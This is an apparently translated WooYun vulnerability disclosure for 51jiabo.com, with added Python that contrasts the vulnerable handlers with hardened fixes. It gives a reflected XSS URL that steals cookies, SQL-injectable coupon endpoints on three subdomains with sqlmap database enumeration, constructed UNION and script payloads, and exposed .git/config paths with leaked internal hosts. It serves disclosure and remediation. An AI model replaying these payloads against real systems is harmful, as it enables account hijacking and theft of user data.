WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2016-03-21: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2016-05-05: The vendor has actively ignored the vulnerability; details disclosed to the public.
As the title says.
#1 XSS: no filtering at all, none whatsoever
http://sh.51jiabo.com/member/login.shtml?redirect_url=b3JkZXIvc2FsZQ==%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
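The reflected value in #1 is the base64 of `order/sale` followed by a script tag, and the login page echoes the whole query value back unescaped. The Python below is an added example, not code from the report or from 51jiabo: it models that unsafe reflection beside a hardened handler that strictly base64-decodes `redirect_url`, accepts only a clean site-relative path, and HTML-escapes what it echoes. The form markup, the default landing page and the allowed-path pattern are assumptions.

```python
import base64
import html
import re

# Landing page used when redirect_url is missing or rejected (assumption).
DEFAULT_REDIRECT = "/member/"

# After base64 decoding, only a plain relative path such as "order/sale" is accepted (assumption).
_SAFE_PATH = re.compile(r"^[A-Za-z0-9_\-./]+$")


def render_login_vulnerable(redirect_url: str) -> str:
    """Models the reported behaviour: the raw query value is echoed into the page unescaped."""
    return (
        '<form action="/member/login.shtml">'
        f'<input type="hidden" name="redirect_url" value="{redirect_url}">'
        "</form>"
    )


def safe_redirect(redirect_url: str, default: str = DEFAULT_REDIRECT) -> str:
    """Decode the base64 value and keep it only if it is a clean site-relative path."""
    try:
        # validate=True rejects any character outside the base64 alphabet,
        # so "<script>..." appended to the encoded path fails here.
        decoded = base64.b64decode(redirect_url, validate=True).decode("utf-8")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueError
        return default
    if not _SAFE_PATH.match(decoded) or ".." in decoded or decoded.startswith("/"):
        return default  # blocks traversal and protocol-relative "//evil" open redirects
    return "/" + decoded


def render_login_fixed(redirect_url: str) -> str:
    """Hardened version: validate first, then HTML-escape whatever is echoed."""
    target = html.escape(safe_redirect(redirect_url), quote=True)
    return (
        '<form action="/member/login.shtml">'
        f'<input type="hidden" name="redirect_url" value="{target}">'
        "</form>"
    )


# Constructed attacker input: the report's payload after URL decoding.
PAYLOAD = "b3JkZXIvc2FsZQ==<script>alert(document.cookie)</script>"
```

Validation and output encoding are both needed: the allowlist stops the script tag and open redirects, and `html.escape` guarantees that even a value that slips past future changes to the allowlist cannot break out of the attribute.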
#2 SQL injection
http://zz.51jiabo.com/get_special_coupon?code_id=2
http://qd.51jiabo.com/get_special_coupon?code_id=2
http://sh.51jiabo.com/get_special_coupon?code_id=2
current user: '[email protected].%'
current database: 'hxjb_user'
available databases [4]:
[*] hxjb_manage
[*] hxjb_user
[*] information_schema
[*] test
Data of 980,000 users exposed
The whole database can be dumped
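The `code_id` parameter of `get_special_coupon` is numeric, yet the sqlmap output above shows it reaches the database unparameterized. The following Python is an added example, not the site's code: it models the vulnerable endpoint beside a hardened one, using an in-memory SQLite database with constructed coupon and member tables (the report's targets run MySQL; the table names, columns and rows here are assumptions). The same bound-parameter fix applies in CodeIgniter, whose `$this->db->query()` accepts a bindings array.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the coupon and member tables (assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE special_coupon (code_id INTEGER PRIMARY KEY, code TEXT, discount TEXT);
        CREATE TABLE member (id INTEGER PRIMARY KEY, phone TEXT, pwd_hash TEXT);
        INSERT INTO special_coupon VALUES (1, 'WELCOME', '10%'), (2, 'SPRING', '20%');
        INSERT INTO member VALUES (1, '13800000001', 'HASH-A'), (2, '13800000002', 'HASH-B');
        """
    )
    return conn


def get_special_coupon_vulnerable(conn: sqlite3.Connection, code_id: str) -> list:
    """Models the reported endpoint: the query parameter is pasted straight into the SQL text."""
    sql = f"SELECT code, discount FROM special_coupon WHERE code_id = {code_id}"
    return conn.execute(sql).fetchall()


def get_special_coupon_fixed(conn: sqlite3.Connection, code_id: str) -> list:
    """Hardened version: enforce the expected type, then bind the value as a parameter."""
    if not code_id.isdigit():
        raise ValueError("code_id must be a non-negative integer")
    sql = "SELECT code, discount FROM special_coupon WHERE code_id = ?"
    return conn.execute(sql, (int(code_id),)).fetchall()


# Constructed attacker input: a UNION that returns member rows through the coupon endpoint,
# the same class of query sqlmap automates to enumerate users and databases.
UNION_PAYLOAD = "0 UNION SELECT phone, pwd_hash FROM member"
```

Against the vulnerable function the payload turns a coupon lookup into a dump of another table, which is exactly what "the whole database can be dumped" means in practice; the fixed function never lets the value become SQL syntax, and the type check rejects it before the query is even built.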
#3 Application misconfiguration: full site source code plus sensitive database information leaked
http://www.ticket.51jiabo.com/.git/config
http://gz.ticket.51jiabo.com/.git/config
http://ks.ticket.51jiabo.com/.git/config ...
Database information leaked
However, these can't be reached from outside. Part of the sensitive information:
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
# test
// $config['API_BURL'] = 'http://test.api.51jiabo.com:8080/hxjb/'; // test API base path
# production
$config['API_BURL'] = 'https://api.51jiabo.com/hxjb/'; // API base path
$config['SMS_LINK'] = 'http://172.16.1.33:8888/sms/send.do'; // SMS channel
$config['SEND_SMS_LINK'] = 'http://172.16.1.33:8888/sms/sendSms.do'; // template SMS channel
# LOG Host
$config['LOG_BURL'] = 'http://172.16.1.68:8080/'; // LOG Host
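Two checks a practitioner wants for #3: confirming that a 200 response for `/.git/config` is a real git config rather than a soft-404 page (and reading the remote it points at), and triaging a leaked config for which hosts are actually reachable from the Internet. The Python below is an added example, not code from the report or the site. The git config sample and its remote URL are constructed; the CodeIgniter config sample reproduces the lines quoted in the report. Hosts in 172.16.0.0/12 are RFC 1918 private addresses, which is why the SMS and log endpoints above can't be reached from outside.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed sample of a served /.git/config (assumption); the remote URL is hypothetical.
SAMPLE_GIT_CONFIG = """\
[core]
\trepositoryformatversion = 0
\tfilemode = true
\tbare = false
[remote "origin"]
\turl = git@git.example.internal:team/ticket.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
"""

# Constructed soft-404: a 200 response carrying an HTML page instead of a config file.
SAMPLE_SOFT_404 = "<html><head><title>404</title></head><body>not found</body></html>"

# The leaked CodeIgniter config as quoted in the report.
SAMPLE_PHP_CONFIG = """\
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
// $config['API_BURL'] = 'http://test.api.51jiabo.com:8080/hxjb/';
$config['API_BURL'] = 'https://api.51jiabo.com/hxjb/';
$config['SMS_LINK'] = 'http://172.16.1.33:8888/sms/send.do';
$config['SEND_SMS_LINK'] = 'http://172.16.1.33:8888/sms/sendSms.do';
$config['LOG_BURL'] = 'http://172.16.1.68:8080/';
"""


def parse_git_config(body: str) -> dict:
    """Minimal parser for git's INI-style config: {section: {key: value}}."""
    sections, current = {}, None
    for raw in body.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()  # drop comments
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.strip()] = value.strip()
    return sections


def is_git_config(body: str) -> bool:
    """True only for a real config: a [core] section with repositoryformatversion."""
    return "repositoryformatversion" in parse_git_config(body).get("core", {})


def remote_urls(body: str) -> list:
    """Remote URLs show where the full history lives, often an internal git server."""
    cfg = parse_git_config(body)
    return [v["url"] for s, v in cfg.items() if s.startswith("remote ") and "url" in v]


_URL_RE = re.compile(r"https?://[^\s'\"]+")


def classify_hosts(text: str) -> dict:
    """Split hosts found in leaked config text into private (RFC 1918 etc.) and public."""
    out = {"private": set(), "public": set()}
    for url in _URL_RE.findall(text):
        host = urlsplit(url).hostname
        if host is None:
            continue
        try:
            kind = "private" if ipaddress.ip_address(host).is_private else "public"
        except ValueError:
            kind = "public"  # a DNS name rather than a literal IP (assumption: resolvable)
        out[kind].add(host)
    return out
```

A served `.git/` directory is the real problem here, not the config file alone: with refs and objects fetchable, the working tree can be reconstructed, which is what "full site source code" in the heading refers to. The private hosts are still worth recording for the report, since they become reachable the moment any SSRF or internal foothold exists.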
Vendor could not be contacted, or the vendor actively refused
Vulnerability Rank: 15 (WooYun rating)